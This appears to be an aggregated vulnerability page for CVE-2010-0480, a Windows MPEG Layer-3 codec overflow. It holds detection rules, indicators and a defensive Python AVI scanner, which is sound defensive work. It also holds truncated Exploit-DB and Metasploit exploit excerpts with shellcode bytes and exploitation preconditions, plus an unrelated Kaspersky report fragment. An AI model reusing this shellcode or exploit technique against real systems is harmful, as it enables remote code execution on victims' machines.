CVE-2010-0480
Published: 2010-04-14
CVE-2010-0480: Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and…
Priority: P1 · 78 · critical · 9.3 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 67.89% (99.2th percentile)
Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability."
Detection & IOCs (extracted from sources)
- bytes: \x00\xff\xff\xff (nSamplesPerSecField at offset 4428 in AVI)
- bytes: 73 74 72 66 (strf chunk marker)
- bytes: 93 00 00 00 (MPEG Layer-3 codec identifier at distance:8 within:4 of strf)
- snort: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow"; flow:established,to_client; flowbits:isset,ET.AVI.RIFF.Chunk; content:"|73 74 72 66|"; content:"|93 00 00 00|"; distance:8; within:4; reference:cve,2010-0480; reference:url,www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/; reference:url,www.exploit-db.com/exploits/14895/; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-026.mspx; classtype:attempted-user; sid:2012143; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_01_05, cve CVE_2010_0480, deployment Perimeter, confidence High, signature_severity Major, tag Web_Client_Attacks, updated_at 2019_07_26;)
- bytes: \xEB\x6B\x5A\x31\xC9\x6A\x10\x52\x42\x52\x51\xFF\xD0\x53\x68\x7E\xD8\xE2\x73\xFF\xD6\x6A\x00\xFF\xD0\xFF\xD7\x50\x68\xA8\xA2\x4D\xBC\xFF\xD6 (shellcode stub)
- Detect crafted AVI files delivered over HTTP by matching the RIFF/AVI strf chunk (|73 74 72 66|) followed at distance 8 by the MPEG Layer-3 codec tag |93 00 00 00|; the Emerging Threats flowbit ET.AVI.RIFF.Chunk must be set first.
- The exploit patches the nSamplesPerSecField in the AVI stream header at file offset 4428 with the value \x00\xff\xff\xff to trigger the division-by-zero / overflow condition; AVI files with this value at that field offset should be flagged.
- The vulnerable component is l3codeca.acm version 1.9.0.306; presence of this file version on a host indicates an unpatched system susceptible to CVE-2010-0480.
- The .NET DLL memory-mapping technique loads shellcode at base address 0x72000000; memory forensics or crash dumps showing EIP/shellcode near this address are indicative of exploitation.
- On IE 8 targets the malicious URL must be in the browser's Trusted Sites zone for the .NET control to load; exploitation will silently fail against IE 8 without this precondition.
- The overflow only overwrites the three least-significant bytes of the saved EIP with 0x00; standard ROP/ret2libc techniques do not apply, and exploitation relies on the .NET DLL memory-mapping technique to place shellcode at a predictable address.
- The Metasploit module requires .NET CLR to be installed on the target; without it the exploit will not function.
- The shellcode embedded in exploit.dll must not exceed 735 bytes; the exploit generator will abort if this limit is exceeded.
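As an added, defender-side example (not code from this page's sources, the Emerging Threats rule or the Metasploit project), the scanner below applies the two file-content indicators listed above to an AVI byte string: the |93 00 00 00| bytes placed 8 bytes past the end of the strf marker, exactly as sid:2012143's distance:8/within:4 expresses it, and the \x00\xff\xff\xff value at file offset 4428. The RIFF chunk walker, the finding labels and the constructed sample AVI are this example's own assumptions; the scanner works on file content, so the HTTP flowbit precondition of the network rule does not apply to it.

```python
import struct
from typing import Iterator, List, Tuple

# Indicators taken from the page's Detection & IOCs section.
STRF_MARKER = b"strf"                 # |73 74 72 66|
MP3_TAG = b"\x93\x00\x00\x00"         # |93 00 00 00|, expected 8 bytes past the end of "strf"
NSAMPLES_IOC = b"\x00\xff\xff\xff"    # value the PoC writes at the nSamplesPerSec field
NSAMPLES_OFFSET = 4428                # file offset of that field in the PoC's AVI

Finding = Tuple[str, int]  # (label, file offset); labels are this example's own naming


def iter_chunks(data: bytes, start: int, end: int) -> Iterator[Tuple[bytes, int, int]]:
    """Walk RIFF chunks in data[start:end], descending into RIFF/LIST containers.

    Yields (fourcc, payload_offset, payload_size) for every leaf chunk. A chunk
    whose declared size runs past the buffer is treated as truncation and the
    walk stops, so a malformed size field cannot make us read out of bounds.
    """
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        payload = pos + 8
        if payload + size > end:
            break
        if fourcc in (b"RIFF", b"LIST"):
            # The first 4 payload bytes are the form/list type ('AVI ', 'hdrl', ...).
            yield from iter_chunks(data, payload + 4, payload + size)
        else:
            yield fourcc, payload, size
        pos = payload + size + (size & 1)  # RIFF chunks are padded to even length


def scan_avi(data: bytes) -> List[Finding]:
    """Return the CVE-2010-0480 file indicators present in an AVI byte string."""
    findings: List[Finding] = []

    # Structured check: inside each strf chunk, payload offset 4 is exactly
    # 8 bytes past the end of the "strf" marker, which is where the ET rule's
    # distance:8 / within:4 places the |93 00 00 00| match.
    for fourcc, off, size in iter_chunks(data, 0, len(data)):
        if fourcc == STRF_MARKER and size >= 8 and data[off + 4:off + 8] == MP3_TAG:
            findings.append(("strf_mp3_tag", off - 8))

    # Raw check: the same byte relationship as sid:2012143 without trusting the
    # chunk tree, so a deliberately malformed RIFF structure is still caught.
    pos = data.find(STRF_MARKER)
    while pos != -1:
        if data[pos + 12:pos + 16] == MP3_TAG:
            findings.append(("ids_sid2012143_pattern", pos))
        pos = data.find(STRF_MARKER, pos + 4)

    # Fixed-offset IOC from the division-by-zero PoC.
    if data[NSAMPLES_OFFSET:NSAMPLES_OFFSET + 4] == NSAMPLES_IOC:
        findings.append(("nsamplespersec_00ffffff_at_4428", NSAMPLES_OFFSET))

    return findings


# --- constructed sample input (not a real capture) ---------------------------

def _chunk(fourcc: bytes, payload: bytes) -> bytes:
    return fourcc + struct.pack("<I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")


def _list(form: bytes, body: bytes) -> bytes:
    return _chunk(b"LIST", form + body)


def build_sample(tag: bytes, ioc_at_4428: bool = False) -> bytes:
    """Minimal RIFF/AVI skeleton whose single strf chunk carries `tag` at payload offset 4."""
    strf_payload = b"\x00" * 4 + tag + b"\x00" * 12   # only payload bytes 4..8 matter here
    strl = _list(b"strl", _chunk(b"strh", b"\x00" * 56) + _chunk(b"strf", strf_payload))
    hdrl = _list(b"hdrl", _chunk(b"avih", b"\x00" * 56) + strl)
    body = b"AVI " + hdrl + _list(b"movi", b"")
    if ioc_at_4428:
        # Pad with a JUNK chunk so that file offset 4428 exists and holds the IOC value.
        head_len = 8 + len(body) + 8  # RIFF header + body so far + JUNK chunk header
        junk = bytearray(NSAMPLES_OFFSET + 4 - head_len)
        junk[NSAMPLES_OFFSET - head_len:NSAMPLES_OFFSET - head_len + 4] = NSAMPLES_IOC
        body += _chunk(b"JUNK", bytes(junk))
    return b"RIFF" + struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    for name, sample in (("benign", build_sample(b"\x44\xac\x00\x00")),
                         ("strf tag", build_sample(MP3_TAG)),
                         ("strf tag + offset 4428", build_sample(MP3_TAG, ioc_at_4428=True))):
        print(f"{name}: {scan_avi(sample)}")
```

Running the two checks side by side is deliberate: the structured walk tells an analyst which stream header carries the tag, while the raw scan reproduces the IDS match and still fires on a file whose chunk sizes were corrupted to defeat a parser.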
CVSS provenance
- nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
- vulncheck · 9.3 CRITICAL
GHSA
GHSA-cw97-jmj5-gm8h (ghsa_unreviewed · 2022-05-02): CVE-2010-0480 [HIGH] CWE-119 Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1
VulnCheck
vulncheck · 2010 · CVSS 9.3: CVE-2010-0480 [CRITICAL] Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://users.ece.cmu.edu/~tdumitra/public_documents/bilge12_zero_day.pdf
Suricata
suricata · 2011-01-05: CVE-2010-0480 ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow
Rule: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Windows MPEG Layer-3 Audio Decoder Buffer Overflow"; flow:established,to_client; flowbits:isset,ET.AVI.RIFF.Chunk; content:"|73 74 72 66|"; content:"|93 00 00 00|"; distance:8; within:4; reference:cve,2010-0480; reference:url,www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/; reference:url,www.exploit-db.com/exploits/14895/; reference:url,www.microsoft.com/technet/security/Bulletin/MS10-026.mspx; classtype:attempted-user; sid:2012143; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_01_05, cve CVE_2010_0480, deployment Perimeter, confidence High, signature_severity Major, tag Web_Client_Attacks, updated_at 2019_07_26;)
Exploit-DB
exploitdb · 2011-08-13: CVE-2010-0480 Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)
---
##
# $Id: ms10_026_avi_nsamplespersec.rb 13555 2011-08-13 02:15:05Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',
'Description' => %q{
This module exploits a buffer overflow in l3codecx.ax while processing
AVI files with MPEG Layer-3 audio contents. The overflow only allows overwriting
with 0's, so the three least significant bytes of EIP saved on the stack are
overwritten and shellcode is mapped usi
Exploit-DB
exploitdb · 2010-09-24: CVE-2010-0480 Microsoft MPEG Layer-3 Audio Decoder - Division By Zero
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-24-microsoft-mpeg-layer-3-audio-decoder-division-by-zero/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15096.zip (moaub-24-mp3-exploit.zip)
'''
'''
Title : Microsoft MPEG Layer-3 Audio Decoder Division By Zero
Version : l3codeca.acm 1-9-0-306 (XP SP2 - XP SP3)
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Med/High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
MOAUB Number : MOAUB-02
'''
import sys
import struct
de
Exploit-DB
exploitdb · 2010-09-05 · CVSS 9.3: CVE-2010-0480 [CRITICAL] Microsoft MPEG Layer-3 - Remote Command Execution
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
'''
fHTML = open('index.html', 'w')
fHTML.write(strHTML)
fHTML.close()
fdR = open('exploit.dll', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:1380]
str2 = strTotal[2115:]
shellcode = '\xEB\x6B\x5A\x31\xC9\x6A\x10\x52\x42\x52\x51\xFF\xD0\x53\x68\x7E\xD8\xE2\x73\xFF\xD6\x6A\x00\xFF\xD0\xFF\xD7\x50\x68\xA8\xA2\x4D\xBC\xFF\xD6\xE8\xDA\xFF\xFF\xFF\x00\x54\x68\x65\x20\x65\x78\x70\x6C\x6F\x69\x74\x20\x77\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x21\x00\x5E\x6A\x30\x59\x64\x8B\x19\x8B\x5B\x0C\x8B\x5B\x1C\x8B\x1B\x8B\x5B\x08\x53\x68\x8E\x4E\x0E\xEC\xFF\xD6\x89\xC7\xE8\xB3\xFF\xFF\xFF\x55\x53\x45\x52\x33\x
Metasploit
metasploit: MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
This module exploits a buffer overflow in l3codecx.ax while processing AVI files with MPEG Layer-3 audio contents. The overflow only allows overwriting with 0's, so the three least significant bytes of EIP saved on the stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note that on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.
Securelist
Investigation Report for the September 2014 Equation malware detection incident in the US
blogs_securelist·2017-11-16
Investigation Report for the September 2014 Equation malware detection incident in the US
Authors
- Kaspersky
## Background
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:
1. Was our software used outside of its intended functionality to pull classified information from a person’s c
References
- http://securityreason.com/securityalert/8336
- http://www.us-cert.gov/cas/techalerts/TA10-103A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-026
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7441